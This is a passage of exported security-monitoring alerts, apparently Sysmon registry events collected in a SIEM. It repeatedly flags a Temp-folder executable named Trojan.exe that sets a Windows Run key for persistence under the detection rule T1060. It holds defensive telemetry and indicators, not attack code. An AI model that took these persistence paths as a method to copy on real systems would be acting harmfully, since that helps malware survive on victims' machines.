HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:28.703860200Z"",""eventRecordID"":""1402"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:28.690\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:28.690"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:40.818",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:27.658 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:27.666601600Z"",""eventRecordID"":""1401"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:27.658\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:27.658"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:39.770",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:26.612 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:26.636758200Z"",""eventRecordID"":""1400"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:26.612\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:26.612"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:38.775",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:25.580 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:25.582755400Z"",""eventRecordID"":""1399"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:25.580\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:25.580"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:37.692",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:24.564 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:24.568179200Z"",""eventRecordID"":""1398"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:24.564\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:24.564"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:36.692",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:23.533 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:23.538072300Z"",""eventRecordID"":""1397"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:23.533\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:23.533"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:35.629",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:22.502 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:22.504784200Z"",""eventRecordID"":""1396"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:22.502\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:22.502"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:34.617",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:21.487 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:21.491083300Z"",""eventRecordID"":""1395"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:21.487\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:21.487"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:33.613",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:20.471 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:20.486270200Z"",""eventRecordID"":""1394"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:20.471\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:20.471"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:32.613",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:19.455 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:19.458108300Z"",""eventRecordID"":""1393"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:19.455\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:19.455"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.834",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:18.440 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:18.447161500Z"",""eventRecordID"":""1392"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:18.440\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:18.440"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.817",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:17.424 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 